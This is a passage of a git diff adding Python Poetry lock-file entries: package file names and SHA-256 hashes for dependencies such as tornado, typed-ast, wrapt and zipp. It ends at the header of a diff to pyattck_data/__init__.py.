"sha256:a9925e4a4587247ed2191a22df5f6970656cb8ca2bd6284309578f2153e0c4b8"}, + {file = "sphinxcontrib_jsmath-1.0.1-py2.py3-none-any.whl", hash = "sha256:2ec2eaebfb78f3f2078e73666b1415417a116cc848b72e5172e596c871103178"}, +] +sphinxcontrib-qthelp = [ + {file = "sphinxcontrib-qthelp-1.0.3.tar.gz", hash = "sha256:4c33767ee058b70dba89a6fc5c1892c0d57a54be67ddd3e7875a18d14cba5a72"}, + {file = "sphinxcontrib_qthelp-1.0.3-py2.py3-none-any.whl", hash = "sha256:bd9fc24bcb748a8d51fd4ecaade681350aa63009a347a8c14e637895444dfab6"}, +] +sphinxcontrib-serializinghtml = [ + {file = "sphinxcontrib-serializinghtml-1.1.5.tar.gz", hash = "sha256:aa5f6de5dfdf809ef505c4895e51ef5c9eac17d0f287933eb49ec495280b6952"}, + {file = "sphinxcontrib_serializinghtml-1.1.5-py2.py3-none-any.whl", hash = "sha256:352a9a00ae864471d3a7ead8d7d79f5fc0b57e8b3f95e9867eb9eb28999b92fd"}, +] +stevedore = [ + {file = "stevedore-3.5.0-py3-none-any.whl", hash = "sha256:a547de73308fd7e90075bb4d301405bebf705292fa90a90fc3bcf9133f58616c"}, + {file = "stevedore-3.5.0.tar.gz", hash = 
"sha256:f40253887d8712eaa2bb0ea3830374416736dc8ec0e22f5a65092c1174c44335"}, +] +tokenize-rt = [ + {file = "tokenize_rt-4.2.1-py2.py3-none-any.whl", hash = "sha256:08a27fa032a81cf45e8858d0ac706004fcd523e8463415ddf1442be38e204ea8"}, + {file = "tokenize_rt-4.2.1.tar.gz", hash = "sha256:0d4f69026fed520f8a1e0103aa36c406ef4661417f20ca643f913e33531b3b94"}, +] +toml = [ + {file = "toml-0.10.2-py2.py3-none-any.whl", hash = "sha256:806143ae5bfb6a3c6e736a764057db0e6a0e05e338b5630894a5f779cabb4f9b"}, + {file = "toml-0.10.2.tar.gz", hash = "sha256:b3bda1d108d5dd99f4a20d24d9c348e91c4db7ab1b749200bded2f839ccbe68f"}, +] +tomli = [ + {file = "tomli-2.0.1-py3-none-any.whl", hash = "sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc"}, + {file = "tomli-2.0.1.tar.gz", hash = "sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f"}, +] +tornado = [ + {file = "tornado-6.1-cp35-cp35m-macosx_10_9_x86_64.whl", hash = "sha256:d371e811d6b156d82aa5f9a4e08b58debf97c302a35714f6f45e35139c332e32"}, + {file = "tornado-6.1-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:0d321a39c36e5f2c4ff12b4ed58d41390460f798422c4504e09eb5678e09998c"}, + {file = "tornado-6.1-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:9de9e5188a782be6b1ce866e8a51bc76a0fbaa0e16613823fc38e4fc2556ad05"}, + {file = "tornado-6.1-cp35-cp35m-manylinux2010_i686.whl", hash = "sha256:61b32d06ae8a036a6607805e6720ef00a3c98207038444ba7fd3d169cd998910"}, + {file = "tornado-6.1-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:3e63498f680547ed24d2c71e6497f24bca791aca2fe116dbc2bd0ac7f191691b"}, + {file = "tornado-6.1-cp35-cp35m-manylinux2014_aarch64.whl", hash = "sha256:6c77c9937962577a6a76917845d06af6ab9197702a42e1346d8ae2e76b5e3675"}, + {file = "tornado-6.1-cp35-cp35m-win32.whl", hash = "sha256:6286efab1ed6e74b7028327365cf7346b1d777d63ab30e21a0f4d5b275fc17d5"}, + {file = "tornado-6.1-cp35-cp35m-win_amd64.whl", hash = "sha256:fa2ba70284fa42c2a5ecb35e322e68823288a4251f9ba9cc77be04ae15eada68"}, + 
{file = "tornado-6.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:0a00ff4561e2929a2c37ce706cb8233b7907e0cdc22eab98888aca5dd3775feb"}, + {file = "tornado-6.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:748290bf9112b581c525e6e6d3820621ff020ed95af6f17fedef416b27ed564c"}, + {file = "tornado-6.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:e385b637ac3acaae8022e7e47dfa7b83d3620e432e3ecb9a3f7f58f150e50921"}, + {file = "tornado-6.1-cp36-cp36m-manylinux2010_i686.whl", hash = "sha256:25ad220258349a12ae87ede08a7b04aca51237721f63b1808d39bdb4b2164558"}, + {file = "tornado-6.1-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:65d98939f1a2e74b58839f8c4dab3b6b3c1ce84972ae712be02845e65391ac7c"}, + {file = "tornado-6.1-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:e519d64089b0876c7b467274468709dadf11e41d65f63bba207e04217f47c085"}, + {file = "tornado-6.1-cp36-cp36m-win32.whl", hash = "sha256:b87936fd2c317b6ee08a5741ea06b9d11a6074ef4cc42e031bc6403f82a32575"}, + {file = "tornado-6.1-cp36-cp36m-win_amd64.whl", hash = "sha256:cc0ee35043162abbf717b7df924597ade8e5395e7b66d18270116f8745ceb795"}, + {file = "tornado-6.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:7250a3fa399f08ec9cb3f7b1b987955d17e044f1ade821b32e5f435130250d7f"}, + {file = "tornado-6.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:ed3ad863b1b40cd1d4bd21e7498329ccaece75db5a5bf58cd3c9f130843e7102"}, + {file = "tornado-6.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:dcef026f608f678c118779cd6591c8af6e9b4155c44e0d1bc0c87c036fb8c8c4"}, + {file = "tornado-6.1-cp37-cp37m-manylinux2010_i686.whl", hash = "sha256:70dec29e8ac485dbf57481baee40781c63e381bebea080991893cd297742b8fd"}, + {file = "tornado-6.1-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:d3f7594930c423fd9f5d1a76bee85a2c36fd8b4b16921cae7e965f22575e9c01"}, + {file = "tornado-6.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:3447475585bae2e77ecb832fc0300c3695516a47d46cefa0528181a34c5b9d3d"}, + {file = 
"tornado-6.1-cp37-cp37m-win32.whl", hash = "sha256:e7229e60ac41a1202444497ddde70a48d33909e484f96eb0da9baf8dc68541df"}, + {file = "tornado-6.1-cp37-cp37m-win_amd64.whl", hash = "sha256:cb5ec8eead331e3bb4ce8066cf06d2dfef1bfb1b2a73082dfe8a161301b76e37"}, + {file = "tornado-6.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:20241b3cb4f425e971cb0a8e4ffc9b0a861530ae3c52f2b0434e6c1b57e9fd95"}, + {file = "tornado-6.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:c77da1263aa361938476f04c4b6c8916001b90b2c2fdd92d8d535e1af48fba5a"}, + {file = "tornado-6.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:fba85b6cd9c39be262fcd23865652920832b61583de2a2ca907dbd8e8a8c81e5"}, + {file = "tornado-6.1-cp38-cp38-manylinux2010_i686.whl", hash = "sha256:1e8225a1070cd8eec59a996c43229fe8f95689cb16e552d130b9793cb570a288"}, + {file = "tornado-6.1-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:d14d30e7f46a0476efb0deb5b61343b1526f73ebb5ed84f23dc794bdb88f9d9f"}, + {file = "tornado-6.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:8f959b26f2634a091bb42241c3ed8d3cedb506e7c27b8dd5c7b9f745318ddbb6"}, + {file = "tornado-6.1-cp38-cp38-win32.whl", hash = "sha256:34ca2dac9e4d7afb0bed4677512e36a52f09caa6fded70b4e3e1c89dbd92c326"}, + {file = "tornado-6.1-cp38-cp38-win_amd64.whl", hash = "sha256:6196a5c39286cc37c024cd78834fb9345e464525d8991c21e908cc046d1cc02c"}, + {file = "tornado-6.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:f0ba29bafd8e7e22920567ce0d232c26d4d47c8b5cf4ed7b562b5db39fa199c5"}, + {file = "tornado-6.1-cp39-cp39-manylinux1_i686.whl", hash = "sha256:33892118b165401f291070100d6d09359ca74addda679b60390b09f8ef325ffe"}, + {file = "tornado-6.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:7da13da6f985aab7f6f28debab00c67ff9cbacd588e8477034c0652ac141feea"}, + {file = "tornado-6.1-cp39-cp39-manylinux2010_i686.whl", hash = "sha256:e0791ac58d91ac58f694d8d2957884df8e4e2f6687cdf367ef7eb7497f79eaa2"}, + {file = "tornado-6.1-cp39-cp39-manylinux2010_x86_64.whl", hash = 
"sha256:66324e4e1beede9ac79e60f88de548da58b1f8ab4b2f1354d8375774f997e6c0"}, + {file = "tornado-6.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:a48900ecea1cbb71b8c71c620dee15b62f85f7c14189bdeee54966fbd9a0c5bd"}, + {file = "tornado-6.1-cp39-cp39-win32.whl", hash = "sha256:d3d20ea5782ba63ed13bc2b8c291a053c8d807a8fa927d941bd718468f7b950c"}, + {file = "tornado-6.1-cp39-cp39-win_amd64.whl", hash = "sha256:548430be2740e327b3fe0201abe471f314741efcb0067ec4f2d7dcfb4825f3e4"}, + {file = "tornado-6.1.tar.gz", hash = "sha256:33c6e81d7bd55b468d2e793517c909b139960b6c790a60b7991b9b6b76fb9791"}, +] +typed-ast = [ + {file = "typed_ast-1.4.3-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:2068531575a125b87a41802130fa7e29f26c09a2833fea68d9a40cf33902eba6"}, + {file = "typed_ast-1.4.3-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:c907f561b1e83e93fad565bac5ba9c22d96a54e7ea0267c708bffe863cbe4075"}, + {file = "typed_ast-1.4.3-cp35-cp35m-manylinux2014_aarch64.whl", hash = "sha256:1b3ead4a96c9101bef08f9f7d1217c096f31667617b58de957f690c92378b528"}, + {file = "typed_ast-1.4.3-cp35-cp35m-win32.whl", hash = "sha256:dde816ca9dac1d9c01dd504ea5967821606f02e510438120091b84e852367428"}, + {file = "typed_ast-1.4.3-cp35-cp35m-win_amd64.whl", hash = "sha256:777a26c84bea6cd934422ac2e3b78863a37017618b6e5c08f92ef69853e765d3"}, + {file = "typed_ast-1.4.3-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:f8afcf15cc511ada719a88e013cec87c11aff7b91f019295eb4530f96fe5ef2f"}, + {file = "typed_ast-1.4.3-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:52b1eb8c83f178ab787f3a4283f68258525f8d70f778a2f6dd54d3b5e5fb4341"}, + {file = "typed_ast-1.4.3-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:01ae5f73431d21eead5015997ab41afa53aa1fbe252f9da060be5dad2c730ace"}, + {file = "typed_ast-1.4.3-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:c190f0899e9f9f8b6b7863debfb739abcb21a5c054f911ca3596d12b8a4c4c7f"}, + {file = "typed_ast-1.4.3-cp36-cp36m-win32.whl", hash = 
"sha256:398e44cd480f4d2b7ee8d98385ca104e35c81525dd98c519acff1b79bdaac363"}, + {file = "typed_ast-1.4.3-cp36-cp36m-win_amd64.whl", hash = "sha256:bff6ad71c81b3bba8fa35f0f1921fb24ff4476235a6e94a26ada2e54370e6da7"}, + {file = "typed_ast-1.4.3-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0fb71b8c643187d7492c1f8352f2c15b4c4af3f6338f21681d3681b3dc31a266"}, + {file = "typed_ast-1.4.3-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:760ad187b1041a154f0e4d0f6aae3e40fdb51d6de16e5c99aedadd9246450e9e"}, + {file = "typed_ast-1.4.3-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:5feca99c17af94057417d744607b82dd0a664fd5e4ca98061480fd8b14b18d04"}, + {file = "typed_ast-1.4.3-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:95431a26309a21874005845c21118c83991c63ea800dd44843e42a916aec5899"}, + {file = "typed_ast-1.4.3-cp37-cp37m-win32.whl", hash = "sha256:aee0c1256be6c07bd3e1263ff920c325b59849dc95392a05f258bb9b259cf39c"}, + {file = "typed_ast-1.4.3-cp37-cp37m-win_amd64.whl", hash = "sha256:9ad2c92ec681e02baf81fdfa056fe0d818645efa9af1f1cd5fd6f1bd2bdfd805"}, + {file = "typed_ast-1.4.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b36b4f3920103a25e1d5d024d155c504080959582b928e91cb608a65c3a49e1a"}, + {file = "typed_ast-1.4.3-cp38-cp38-manylinux1_i686.whl", hash = "sha256:067a74454df670dcaa4e59349a2e5c81e567d8d65458d480a5b3dfecec08c5ff"}, + {file = "typed_ast-1.4.3-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:7538e495704e2ccda9b234b82423a4038f324f3a10c43bc088a1636180f11a41"}, + {file = "typed_ast-1.4.3-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:af3d4a73793725138d6b334d9d247ce7e5f084d96284ed23f22ee626a7b88e39"}, + {file = "typed_ast-1.4.3-cp38-cp38-win32.whl", hash = "sha256:f2362f3cb0f3172c42938946dbc5b7843c2a28aec307c49100c8b38764eb6927"}, + {file = "typed_ast-1.4.3-cp38-cp38-win_amd64.whl", hash = "sha256:dd4a21253f42b8d2b48410cb31fe501d32f8b9fbeb1f55063ad102fe9c425e40"}, + {file = "typed_ast-1.4.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = 
"sha256:f328adcfebed9f11301eaedfa48e15bdece9b519fb27e6a8c01aa52a17ec31b3"}, + {file = "typed_ast-1.4.3-cp39-cp39-manylinux1_i686.whl", hash = "sha256:2c726c276d09fc5c414693a2de063f521052d9ea7c240ce553316f70656c84d4"}, + {file = "typed_ast-1.4.3-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:cae53c389825d3b46fb37538441f75d6aecc4174f615d048321b716df2757fb0"}, + {file = "typed_ast-1.4.3-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:b9574c6f03f685070d859e75c7f9eeca02d6933273b5e69572e5ff9d5e3931c3"}, + {file = "typed_ast-1.4.3-cp39-cp39-win32.whl", hash = "sha256:209596a4ec71d990d71d5e0d312ac935d86930e6eecff6ccc7007fe54d703808"}, + {file = "typed_ast-1.4.3-cp39-cp39-win_amd64.whl", hash = "sha256:9c6d1a54552b5330bc657b7ef0eae25d00ba7ffe85d9ea8ae6540d2197a3788c"}, + {file = "typed_ast-1.4.3.tar.gz", hash = "sha256:fb1bbeac803adea29cedd70781399c99138358c26d05fcbd23c13016b7f5ec65"}, +] +typeguard = [ + {file = "typeguard-2.13.3-py3-none-any.whl", hash = "sha256:5e3e3be01e887e7eafae5af63d1f36c849aaa94e3a0112097312aabfa16284f1"}, + {file = "typeguard-2.13.3.tar.gz", hash = "sha256:00edaa8da3a133674796cf5ea87d9f4b4c367d77476e185e80251cc13dfbb8c4"}, +] +typing-extensions = [ + {file = "typing_extensions-4.2.0-py3-none-any.whl", hash = "sha256:6657594ee297170d19f67d55c05852a874e7eb634f4f753dbd667855e07c1708"}, + {file = "typing_extensions-4.2.0.tar.gz", hash = "sha256:f1c24655a0da0d1b67f07e17a5e6b2a105894e6824b92096378bb3668ef02376"}, +] +urllib3 = [ + {file = "urllib3-1.26.9-py2.py3-none-any.whl", hash = "sha256:44ece4d53fb1706f667c9bd1c648f5469a2ec925fcf3a776667042d645472c14"}, + {file = "urllib3-1.26.9.tar.gz", hash = "sha256:aabaf16477806a5e1dd19aa41f8c2b7950dd3c746362d7e3223dbe6de6ac448e"}, +] +virtualenv = [ + {file = "virtualenv-20.14.1-py2.py3-none-any.whl", hash = "sha256:e617f16e25b42eb4f6e74096b9c9e37713cf10bf30168fb4a739f3fa8f898a3a"}, + {file = "virtualenv-20.14.1.tar.gz", hash = "sha256:ef589a79795589aada0c1c5b319486797c03b67ac3984c48c669c0e4f50df3a5"}, 
+] +wrapt = [ + {file = "wrapt-1.14.1-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:1b376b3f4896e7930f1f772ac4b064ac12598d1c38d04907e696cc4d794b43d3"}, + {file = "wrapt-1.14.1-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:903500616422a40a98a5a3c4ff4ed9d0066f3b4c951fa286018ecdf0750194ef"}, + {file = "wrapt-1.14.1-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:5a9a0d155deafd9448baff28c08e150d9b24ff010e899311ddd63c45c2445e28"}, + {file = "wrapt-1.14.1-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:ddaea91abf8b0d13443f6dac52e89051a5063c7d014710dcb4d4abb2ff811a59"}, + {file = "wrapt-1.14.1-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:36f582d0c6bc99d5f39cd3ac2a9062e57f3cf606ade29a0a0d6b323462f4dd87"}, + {file = "wrapt-1.14.1-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:7ef58fb89674095bfc57c4069e95d7a31cfdc0939e2a579882ac7d55aadfd2a1"}, + {file = "wrapt-1.14.1-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:e2f83e18fe2f4c9e7db597e988f72712c0c3676d337d8b101f6758107c42425b"}, + {file = "wrapt-1.14.1-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:ee2b1b1769f6707a8a445162ea16dddf74285c3964f605877a20e38545c3c462"}, + {file = "wrapt-1.14.1-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:833b58d5d0b7e5b9832869f039203389ac7cbf01765639c7309fd50ef619e0b1"}, + {file = "wrapt-1.14.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:80bb5c256f1415f747011dc3604b59bc1f91c6e7150bd7db03b19170ee06b320"}, + {file = "wrapt-1.14.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:07f7a7d0f388028b2df1d916e94bbb40624c59b48ecc6cbc232546706fac74c2"}, + {file = "wrapt-1.14.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:02b41b633c6261feff8ddd8d11c711df6842aba629fdd3da10249a53211a72c4"}, + {file = "wrapt-1.14.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2fe803deacd09a233e4762a1adcea5db5d31e6be577a43352936179d14d90069"}, + {file = 
"wrapt-1.14.1-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:257fd78c513e0fb5cdbe058c27a0624c9884e735bbd131935fd49e9fe719d310"}, + {file = "wrapt-1.14.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:4fcc4649dc762cddacd193e6b55bc02edca674067f5f98166d7713b193932b7f"}, + {file = "wrapt-1.14.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:11871514607b15cfeb87c547a49bca19fde402f32e2b1c24a632506c0a756656"}, + {file = "wrapt-1.14.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:8ad85f7f4e20964db4daadcab70b47ab05c7c1cf2a7c1e51087bfaa83831854c"}, + {file = "wrapt-1.14.1-cp310-cp310-win32.whl", hash = "sha256:a9a52172be0b5aae932bef82a79ec0a0ce87288c7d132946d645eba03f0ad8a8"}, + {file = "wrapt-1.14.1-cp310-cp310-win_amd64.whl", hash = "sha256:6d323e1554b3d22cfc03cd3243b5bb815a51f5249fdcbb86fda4bf62bab9e164"}, + {file = "wrapt-1.14.1-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:43ca3bbbe97af00f49efb06e352eae40434ca9d915906f77def219b88e85d907"}, + {file = "wrapt-1.14.1-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:6b1a564e6cb69922c7fe3a678b9f9a3c54e72b469875aa8018f18b4d1dd1adf3"}, + {file = "wrapt-1.14.1-cp35-cp35m-manylinux2010_i686.whl", hash = "sha256:00b6d4ea20a906c0ca56d84f93065b398ab74b927a7a3dbd470f6fc503f95dc3"}, + {file = "wrapt-1.14.1-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:a85d2b46be66a71bedde836d9e41859879cc54a2a04fad1191eb50c2066f6e9d"}, + {file = "wrapt-1.14.1-cp35-cp35m-win32.whl", hash = "sha256:dbcda74c67263139358f4d188ae5faae95c30929281bc6866d00573783c422b7"}, + {file = "wrapt-1.14.1-cp35-cp35m-win_amd64.whl", hash = "sha256:b21bb4c09ffabfa0e85e3a6b623e19b80e7acd709b9f91452b8297ace2a8ab00"}, + {file = "wrapt-1.14.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:9e0fd32e0148dd5dea6af5fee42beb949098564cc23211a88d799e434255a1f4"}, + {file = "wrapt-1.14.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = 
"sha256:9736af4641846491aedb3c3f56b9bc5568d92b0692303b5a305301a95dfd38b1"}, + {file = "wrapt-1.14.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5b02d65b9ccf0ef6c34cba6cf5bf2aab1bb2f49c6090bafeecc9cd81ad4ea1c1"}, + {file = "wrapt-1.14.1-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:21ac0156c4b089b330b7666db40feee30a5d52634cc4560e1905d6529a3897ff"}, + {file = "wrapt-1.14.1-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:9f3e6f9e05148ff90002b884fbc2a86bd303ae847e472f44ecc06c2cd2fcdb2d"}, + {file = "wrapt-1.14.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:6e743de5e9c3d1b7185870f480587b75b1cb604832e380d64f9504a0535912d1"}, + {file = "wrapt-1.14.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:d79d7d5dc8a32b7093e81e97dad755127ff77bcc899e845f41bf71747af0c569"}, + {file = "wrapt-1.14.1-cp36-cp36m-win32.whl", hash = "sha256:81b19725065dcb43df02b37e03278c011a09e49757287dca60c5aecdd5a0b8ed"}, + {file = "wrapt-1.14.1-cp36-cp36m-win_amd64.whl", hash = "sha256:b014c23646a467558be7da3d6b9fa409b2c567d2110599b7cf9a0c5992b3b471"}, + {file = "wrapt-1.14.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:88bd7b6bd70a5b6803c1abf6bca012f7ed963e58c68d76ee20b9d751c74a3248"}, + {file = "wrapt-1.14.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b5901a312f4d14c59918c221323068fad0540e34324925c8475263841dbdfe68"}, + {file = "wrapt-1.14.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d77c85fedff92cf788face9bfa3ebaa364448ebb1d765302e9af11bf449ca36d"}, + {file = "wrapt-1.14.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8d649d616e5c6a678b26d15ece345354f7c2286acd6db868e65fcc5ff7c24a77"}, + {file = "wrapt-1.14.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = 
"sha256:7d2872609603cb35ca513d7404a94d6d608fc13211563571117046c9d2bcc3d7"}, + {file = "wrapt-1.14.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:ee6acae74a2b91865910eef5e7de37dc6895ad96fa23603d1d27ea69df545015"}, + {file = "wrapt-1.14.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:2b39d38039a1fdad98c87279b48bc5dce2c0ca0d73483b12cb72aa9609278e8a"}, + {file = "wrapt-1.14.1-cp37-cp37m-win32.whl", hash = "sha256:60db23fa423575eeb65ea430cee741acb7c26a1365d103f7b0f6ec412b893853"}, + {file = "wrapt-1.14.1-cp37-cp37m-win_amd64.whl", hash = "sha256:709fe01086a55cf79d20f741f39325018f4df051ef39fe921b1ebe780a66184c"}, + {file = "wrapt-1.14.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:8c0ce1e99116d5ab21355d8ebe53d9460366704ea38ae4d9f6933188f327b456"}, + {file = "wrapt-1.14.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:e3fb1677c720409d5f671e39bac6c9e0e422584e5f518bfd50aa4cbbea02433f"}, + {file = "wrapt-1.14.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:642c2e7a804fcf18c222e1060df25fc210b9c58db7c91416fb055897fc27e8cc"}, + {file = "wrapt-1.14.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7b7c050ae976e286906dd3f26009e117eb000fb2cf3533398c5ad9ccc86867b1"}, + {file = "wrapt-1.14.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ef3f72c9666bba2bab70d2a8b79f2c6d2c1a42a7f7e2b0ec83bb2f9e383950af"}, + {file = "wrapt-1.14.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:01c205616a89d09827986bc4e859bcabd64f5a0662a7fe95e0d359424e0e071b"}, + {file = "wrapt-1.14.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:5a0f54ce2c092aaf439813735584b9537cad479575a09892b8352fea5e988dc0"}, + {file = "wrapt-1.14.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:2cf71233a0ed05ccdabe209c606fe0bac7379fdcf687f39b944420d2a09fdb57"}, + {file = "wrapt-1.14.1-cp38-cp38-win32.whl", hash = 
"sha256:aa31fdcc33fef9eb2552cbcbfee7773d5a6792c137b359e82879c101e98584c5"}, + {file = "wrapt-1.14.1-cp38-cp38-win_amd64.whl", hash = "sha256:d1967f46ea8f2db647c786e78d8cc7e4313dbd1b0aca360592d8027b8508e24d"}, + {file = "wrapt-1.14.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3232822c7d98d23895ccc443bbdf57c7412c5a65996c30442ebe6ed3df335383"}, + {file = "wrapt-1.14.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:988635d122aaf2bdcef9e795435662bcd65b02f4f4c1ae37fbee7401c440b3a7"}, + {file = "wrapt-1.14.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9cca3c2cdadb362116235fdbd411735de4328c61425b0aa9f872fd76d02c4e86"}, + {file = "wrapt-1.14.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d52a25136894c63de15a35bc0bdc5adb4b0e173b9c0d07a2be9d3ca64a332735"}, + {file = "wrapt-1.14.1-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:40e7bc81c9e2b2734ea4bc1aceb8a8f0ceaac7c5299bc5d69e37c44d9081d43b"}, + {file = "wrapt-1.14.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:b9b7a708dd92306328117d8c4b62e2194d00c365f18eff11a9b53c6f923b01e3"}, + {file = "wrapt-1.14.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:6a9a25751acb379b466ff6be78a315e2b439d4c94c1e99cb7266d40a537995d3"}, + {file = "wrapt-1.14.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:34aa51c45f28ba7f12accd624225e2b1e5a3a45206aa191f6f9aac931d9d56fe"}, + {file = "wrapt-1.14.1-cp39-cp39-win32.whl", hash = "sha256:dee0ce50c6a2dd9056c20db781e9c1cfd33e77d2d569f5d1d9321c641bb903d5"}, + {file = "wrapt-1.14.1-cp39-cp39-win_amd64.whl", hash = "sha256:dee60e1de1898bde3b238f18340eec6148986da0455d8ba7848d50470a7a32fb"}, + {file = "wrapt-1.14.1.tar.gz", hash = "sha256:380a85cf89e0e69b7cfbe2ea9f765f004ff419f34194018a6827ac0e3edfed4d"}, +] +xdoctest = [ + {file = "xdoctest-1.0.0-py2-none-any.whl", hash = 
"sha256:0b0b5958e0ac0a28c5496f96b7f0adbeb0ea7e0c0a227de1ce3bc79ddb1a4f00"}, + {file = "xdoctest-1.0.0-py3-none-any.whl", hash = "sha256:76f44dc74515ff4bdf3cc3e91a2e408cf5699cfa03367634efaadf138c7b132d"}, + {file = "xdoctest-1.0.0.tar.gz", hash = "sha256:7ebba7e71457e6e7cf86c463699575e52b1c9cc32ee2ee5e72256d6cd3aaeb2d"}, +] +xlrd = [ + {file = "xlrd-2.0.1-py2.py3-none-any.whl", hash = "sha256:6a33ee89877bd9abc1158129f6e94be74e2679636b8a205b43b85206c3f0bbdd"}, + {file = "xlrd-2.0.1.tar.gz", hash = "sha256:f72f148f54442c6b056bf931dbc34f986fd0c3b0b6b5a58d013c9aef274d0c88"}, +] +zipp = [ + {file = "zipp-3.8.0-py3-none-any.whl", hash = "sha256:c4f6e5bbf48e74f7a38e7cc5b0480ff42b0ae5178957d564d18932525d5cf099"}, + {file = "zipp-3.8.0.tar.gz", hash = "sha256:56bf8aadb83c24db6c4b577e13de374ccfb67da2078beba1d037c17980bf43ad"}, +] diff --git a/pyattck_data/__init__.py 